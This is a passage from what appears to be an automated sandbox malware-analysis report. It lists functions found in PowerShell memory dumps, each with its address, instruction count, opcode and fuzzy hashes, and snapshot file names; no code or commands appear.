                                                                                    • Opcode Fuzzy Hash: 672a78fb4ea671d6a8f0a87d652791d2b3318c176977d8b4c62199f0c903c2bd
                                                                                    • Instruction Fuzzy Hash: CA627EB4B00209CFEB14CB98C544A6ABBB2EFC5314F24C069D919AF755DB76EC46CB42
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A17D53 Relevance: .6, Instructions: 578COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 642070cc3bd4659d3568a9f76bb5fcd1a7d061491807db68a04481f2231bb4b6
                                                                                    • Instruction ID: c82ab75af682bae9346c89ee5bba9bf26b1c955a0ff873895611dfff070bb377
                                                                                    • Opcode Fuzzy Hash: 642070cc3bd4659d3568a9f76bb5fcd1a7d061491807db68a04481f2231bb4b6
                                                                                    • Instruction Fuzzy Hash: FE326BB4A00205DFEB14CB98C544E6AB7B2EFC5724F15C099E929AF355CB76EC42CB41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A10638 Relevance: .5, Instructions: 513COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 45c457a906565ef070cb4cc6d1ca6f179d6e5be1e8e50e3b79a74605a45e0365
                                                                                    • Instruction ID: 150cf71756bd31b597dc69d9e87cb50bab6202ead7d94601fdb1352445722ced
                                                                                    • Opcode Fuzzy Hash: 45c457a906565ef070cb4cc6d1ca6f179d6e5be1e8e50e3b79a74605a45e0365
                                                                                    • Instruction Fuzzy Hash: 44F157B1B04356CFF7158B78C81066BBBB6EFC1254F1880ABE565CB652DB31D881C7A2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A184E5 Relevance: .5, Instructions: 483COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e73df4749c29b8d8ca3830c7af863f1e074292cde2c775713479752617839d44
                                                                                    • Instruction ID: fa20a2b82d7f7212cbcded3c68b6c8ee348abbe63941febc5e19f1e9da910b5f
                                                                                    • Opcode Fuzzy Hash: e73df4749c29b8d8ca3830c7af863f1e074292cde2c775713479752617839d44
                                                                                    • Instruction Fuzzy Hash: 96124AB4A00205DFEB14CB88C544E6AB7B2EFC4724F15C069E929AF355DB7AEC46CB41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A17728 Relevance: .5, Instructions: 464COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3c2ac3bb8e1aa895619c4badc4f20745c9aee1519064841fa4a475f34784e4d3
                                                                                    • Instruction ID: 5608d4f31bba698e7079dc315185cb2dc8275da087b3c84ca892e623edb4f9f2
                                                                                    • Opcode Fuzzy Hash: 3c2ac3bb8e1aa895619c4badc4f20745c9aee1519064841fa4a475f34784e4d3
                                                                                    • Instruction Fuzzy Hash: 6B02D1B0B00206DFE714DBA8C850BAEBBB3AFC5314F149069E515AB791DB71DC41CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A15B48 Relevance: .5, Instructions: 464COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 60111e08dde919452f2fb06bc7572a8da52b503c2996f695444fd8ae7f943634
                                                                                    • Instruction ID: 539a655edcbcdff9dbe200240ae31fcadf3e911fc04d2d528f01e56ac804dd75
                                                                                    • Opcode Fuzzy Hash: 60111e08dde919452f2fb06bc7572a8da52b503c2996f695444fd8ae7f943634
                                                                                    • Instruction Fuzzy Hash: FEE129B1F05246CFEB25CB78C81466ABBB1EFC6210F14C0ABD565CB292DB35C951C7A2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A19878 Relevance: .4, Instructions: 434COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5f607696114cf3c6a8b2ec77f769527727bcef4a195a1aa51223450d7b5ae15b
                                                                                    • Instruction ID: e9a86c35e6f2cfb7fa0ce199048c9866b82e860878a233d956e385ecd5537dc0
                                                                                    • Opcode Fuzzy Hash: 5f607696114cf3c6a8b2ec77f769527727bcef4a195a1aa51223450d7b5ae15b
                                                                                    • Instruction Fuzzy Hash: A10270B0A00245DFEB20CB58C560BAAB7B2EFC5714F14C459E91AAB755DB32FC42CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E7060 Relevance: .4, Instructions: 431COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a6087f940be1a7a7059b8282d03aebaa941950f8daa5a2f1fc337f2223673dee
                                                                                    • Instruction ID: 7e5fcba6d7bc2eb69bb9d409a0b52b13dc8f7cf6bc2ad4bb3525c9a5b726a9f2
                                                                                    • Opcode Fuzzy Hash: a6087f940be1a7a7059b8282d03aebaa941950f8daa5a2f1fc337f2223673dee
                                                                                    • Instruction Fuzzy Hash: 93020975A01209DFDB15CF98D884AAEBBF2FF88310F258559E905AB351C771ED82CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A192AB Relevance: .4, Instructions: 387COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b9dec1bb39d9cec7c04e180d163372626ea266b1c6dcb6eec0632bfd98aaed35
                                                                                    • Instruction ID: ee78acef057d772601e09c24e58225f924a0b00f1ec15ef99d1acdd83dfb98d0
                                                                                    • Opcode Fuzzy Hash: b9dec1bb39d9cec7c04e180d163372626ea266b1c6dcb6eec0632bfd98aaed35
                                                                                    • Instruction Fuzzy Hash: FCF18FB0B00255DFE724DB58C850FAABBA3AFC4744F108099E509AF791DB71ED45CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A1A048 Relevance: .3, Instructions: 339COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f0998883f21cbea05f172a6ea851460090ddfef656c5d027463bd9ec67e993ed
                                                                                    • Instruction ID: bd5514125c9e7806774cecaf1657db9a777e270c3d2fe27935fc9cddc1eeb82a
                                                                                    • Opcode Fuzzy Hash: f0998883f21cbea05f172a6ea851460090ddfef656c5d027463bd9ec67e993ed
                                                                                    • Instruction Fuzzy Hash: 1ED1ADB0B00205DBEB18DBA8C454BAEBBB2AFC4704F25C069D611AF755CF76DC418B96
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A1A028 Relevance: .3, Instructions: 270COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c70b1859854acdfa842379c03cd04e98de793958be9be541a713335de116b167
                                                                                    • Instruction ID: e0653aa02db2550b5aa150e13165166106ae4c2df3599d8fe75ee56cb0efd525
                                                                                    • Opcode Fuzzy Hash: c70b1859854acdfa842379c03cd04e98de793958be9be541a713335de116b167
                                                                                    • Instruction Fuzzy Hash: 16B1ACB4A01205CFEB18CB68C444BAEBBB2AFC8304F25C059D915AF355CB76EC45CB96
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A17963 Relevance: .2, Instructions: 241COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ee1d1ceb98c5863687cab76d3a76a6d291c4cbe2e1203c41b0d1177b9b5ad841
                                                                                    • Instruction ID: 6b4b60f824fca61b9197ba63e6a65e9acc466cebb88445e73cc39325c3536086
                                                                                    • Opcode Fuzzy Hash: ee1d1ceb98c5863687cab76d3a76a6d291c4cbe2e1203c41b0d1177b9b5ad841
                                                                                    • Instruction Fuzzy Hash: 57915AB4B00202DBE714DF94C544FAABBB3AFC8314F1590A9E515AB791CB72EC41CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E6258 Relevance: .2, Instructions: 218COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b60faccc9df2733afdb3d4106bbecae72dd9ddafee5bb8c40ac87c1b8e89c10c
                                                                                    • Instruction ID: b939e5201c30b587351cb2fc32b45bed43ac71051e7a5010c4e142940247e0eb
                                                                                    • Opcode Fuzzy Hash: b60faccc9df2733afdb3d4106bbecae72dd9ddafee5bb8c40ac87c1b8e89c10c
                                                                                    • Instruction Fuzzy Hash: 7B81BE30B01219CFDB15DBA9D840AAEBBF6FFC8304F258569E5059B355DB74AC06CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A111D4 Relevance: .2, Instructions: 218COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 26fa77c23b4f6533ab6eafbedd412bdb25c39095403cd41760fdf886e9eccdbc
                                                                                    • Instruction ID: 6e6fcdb019c0e1e1c6e8fda6d7853f3410e5c3e31a5c4574617dd5cb8dbd64f3
                                                                                    • Opcode Fuzzy Hash: 26fa77c23b4f6533ab6eafbedd412bdb25c39095403cd41760fdf886e9eccdbc
                                                                                    • Instruction Fuzzy Hash: CF8190B4B00209DFE714CB58C850BAABBB2EFC5714F14C069EA159F751DA72EC428B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E5BF8 Relevance: .2, Instructions: 184COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1ff48e953a2b5c81a7646a0b33752e9f402cd3b8d046bdb1c6618ac12c4b7196
                                                                                    • Instruction ID: b4a62419faabd1d858bde6a65c60ce1623e5fef54752378e947823f50931fa96
                                                                                    • Opcode Fuzzy Hash: 1ff48e953a2b5c81a7646a0b33752e9f402cd3b8d046bdb1c6618ac12c4b7196
                                                                                    • Instruction Fuzzy Hash: 38717C30E01249CFDB15DFE8C9586ADBBB2AF85709F258429E402AF395DF749C49CB41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E66A8 Relevance: .2, Instructions: 150COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9fa705bc9e96bea88d240cfac460a3548bde2e1f038eba078caabcd4614c30f3
                                                                                    • Instruction ID: 4864bbbf2aa157a8b32672b4237f83692208f0ac65d443cb76e6156c80612bf8
                                                                                    • Opcode Fuzzy Hash: 9fa705bc9e96bea88d240cfac460a3548bde2e1f038eba078caabcd4614c30f3
                                                                                    • Instruction Fuzzy Hash: FD516B74A05245CFCB05CF6CC8D4AEEBBB1FF59310B2581A9E955A73A2C739AC42CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A12B87 Relevance: .1, Instructions: 134COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7e51ba41ca3d6387f53660c5a8ef6e4a8581950e8f5e45ac10b41cfbd839419f
                                                                                    • Instruction ID: a4303a48dd05d404f3b7623e6f0e967e33e52a8d017e6414564b40d4a31e6a44
                                                                                    • Opcode Fuzzy Hash: 7e51ba41ca3d6387f53660c5a8ef6e4a8581950e8f5e45ac10b41cfbd839419f
                                                                                    • Instruction Fuzzy Hash: D841D3F1B053029FEB24CF28C841BAAB7B2BFD5654F1580AAD914CB295D731D840C7A2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E6699 Relevance: .1, Instructions: 118COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d23bdc6f7491b5078a36eb4fd8154bda958b673731bc097c84fe9050fa05ef15
                                                                                    • Instruction ID: f11e6ea4649e2a29ddcf95b924b383dba846993af3f24cc2d4181a31ddfa91b2
                                                                                    • Opcode Fuzzy Hash: d23bdc6f7491b5078a36eb4fd8154bda958b673731bc097c84fe9050fa05ef15
                                                                                    • Instruction Fuzzy Hash: 08410874A01505CFCB05CF9CC984AAEBBF1FF98324B258258E915AB3A5D735EC42CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A162F7 Relevance: .1, Instructions: 114COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 405791248e7b2c63c91b085b0d9279f8f78c66118a3b68f4f4b46487bd8ce16b
                                                                                    • Instruction ID: a528f0f9fca0818273b7c8993cf0249734b5362900e2e0138a27136c8eb68d85
                                                                                    • Opcode Fuzzy Hash: 405791248e7b2c63c91b085b0d9279f8f78c66118a3b68f4f4b46487bd8ce16b
                                                                                    • Instruction Fuzzy Hash: 32412B74A05391DFEB2A8B64C914669BFB2EF86210F1D859BD454CF193CB31DC42C762
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E7050 Relevance: .1, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d3cd85fa4dc423fd166b970891bc6ed874b07b6be09d32453c6e2e99e07b9eda
                                                                                    • Instruction ID: 7780a1be2b76bee124a0b16685a411263c21d776b280722af0330781a57d211d
                                                                                    • Opcode Fuzzy Hash: d3cd85fa4dc423fd166b970891bc6ed874b07b6be09d32453c6e2e99e07b9eda
                                                                                    • Instruction Fuzzy Hash: 78412E74A01205DFCB15CF99C9949EEFBB2FF88311B25856AE905AB364D731EC41CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A1A46E Relevance: .1, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a68af7b7f9b5e26ba16f9730f233c6527da0c13a2762e74ed3c8ae23d68862e6
                                                                                    • Instruction ID: 6fc7431c34055bb94c833100d75fcbaf7acaae105aa321f0c3f5ee58419b2e01
                                                                                    • Opcode Fuzzy Hash: a68af7b7f9b5e26ba16f9730f233c6527da0c13a2762e74ed3c8ae23d68862e6
                                                                                    • Instruction Fuzzy Hash: C23161B0B40214DBE704D7A4C854FAF7A63AFC4754F24C059EA01AF791CFB69C418B96
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A108C2 Relevance: .1, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 164c2783a26eed259e1ece1578cde819911072b749a1c3e41dcc7223d213b613
                                                                                    • Instruction ID: f3d9379fc7804ef23872ebc9d6daf355a005e5345c1ddd961d2dffef6f66dc4f
                                                                                    • Opcode Fuzzy Hash: 164c2783a26eed259e1ece1578cde819911072b749a1c3e41dcc7223d213b613
                                                                                    • Instruction Fuzzy Hash: 2931B5F5A0420ADFFB108B65C5507AB7BB5AFC5350F19806AE824CB256D735C9C0CBA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A1061B Relevance: .1, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 899895415dcaa63d103f88235885058efb76c9babbf78443ab8955b6a678c738
                                                                                    • Instruction ID: 640a4e7afe60d67d80edc0bbce67edc150a31fa9145cfb3b7746e1f94278c1a3
                                                                                    • Opcode Fuzzy Hash: 899895415dcaa63d103f88235885058efb76c9babbf78443ab8955b6a678c738
                                                                                    • Instruction Fuzzy Hash: 1F11E2B1309386CFF7128B14C940A63BF75AFC2254B19809BD574CB162E7B6D884CB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E6248 Relevance: .1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c5e81433abdaaa404c8b932e3e4a8afea603a9d928433807e7704370ae7c84eb
                                                                                    • Instruction ID: 7353f46682165e4553ae4c9cfb77a99934fe7e02556e44c556691eb0099dd566
                                                                                    • Opcode Fuzzy Hash: c5e81433abdaaa404c8b932e3e4a8afea603a9d928433807e7704370ae7c84eb
                                                                                    • Instruction Fuzzy Hash: D5112730A01249CFC726EBADE4444AEBBB1FFC122675184ADE415CB701CB75AC0ACB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E61C1 Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 54e03a6dbcab0a039f70cbcff846933b4cba69b5bcdcaa861523c0178bae814c
                                                                                    • Instruction ID: 1b9227b2aa3e5e22ae2ca962ad79f25d63aacef03cb5f0e68028e3207593f37b
                                                                                    • Opcode Fuzzy Hash: 54e03a6dbcab0a039f70cbcff846933b4cba69b5bcdcaa861523c0178bae814c
                                                                                    • Instruction Fuzzy Hash: 35018430306685DFC32A9B78D45446ABFB2BFD5215355456EE042CB711CB79EC02CB81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E5F58 Relevance: .0, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 31774eeb66383c132106b245d377a3a0a48148a8c97f64f302eb31c2e48c36a4
                                                                                    • Instruction ID: ded3df425a3003001876b8cdaf016a38bc0966c0f12f64ea7228c0c8e0b4e83b
                                                                                    • Opcode Fuzzy Hash: 31774eeb66383c132106b245d377a3a0a48148a8c97f64f302eb31c2e48c36a4
                                                                                    • Instruction Fuzzy Hash: 8A014C30901219DFDB259FE4D959AADBFB2FF54309F210429F103AB295DB754881CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E5E37 Relevance: .0, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dc7ea93dee3d54dc6de67e2e2d977f6c875ef35f6c410e382cab0e1cd4abcdc4
                                                                                    • Instruction ID: 5fa58255e96a48da457d0460f7cda0e122a957e533370476e535f8ae71109f96
                                                                                    • Opcode Fuzzy Hash: dc7ea93dee3d54dc6de67e2e2d977f6c875ef35f6c410e382cab0e1cd4abcdc4
                                                                                    • Instruction Fuzzy Hash: B8017130901219DFDB15DBE0D919AADBB76FF94305F214428F503AB245CBB54C46CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E60B3 Relevance: .0, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7ddec4e4dbbcebfad9388a7b8eed8c7e05e4d80d1379ceafb7e40bf15d81c3f4
                                                                                    • Instruction ID: a1f2e79b34d8e852c635f9e45cc514bedfe158ba02e3f280c5fd7097421f23d5
                                                                                    • Opcode Fuzzy Hash: 7ddec4e4dbbcebfad9388a7b8eed8c7e05e4d80d1379ceafb7e40bf15d81c3f4
                                                                                    • Instruction Fuzzy Hash: 6BF0AF30641209DFDB059BE4C955ABE7B31BBA0309F204418F1039B286CF755C49CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E5EE0 Relevance: .0, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a103ae82245beed038ddad21de92ff9c258d4690834e63fa5d99e32c7dbbb3ef
                                                                                    • Instruction ID: 7807df99c33528376bd85cb6a537035c5944f87c4a6275b5b2fb1e24d7b5c53d
                                                                                    • Opcode Fuzzy Hash: a103ae82245beed038ddad21de92ff9c258d4690834e63fa5d99e32c7dbbb3ef
                                                                                    • Instruction Fuzzy Hash: 09F01434A01119DFDB15DBE5D92AAAEBFB2FB98705F204428F503EB245DB744D05CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E5E94 Relevance: .0, Instructions: 32COMMON
                                                                                    Download Yara Rule
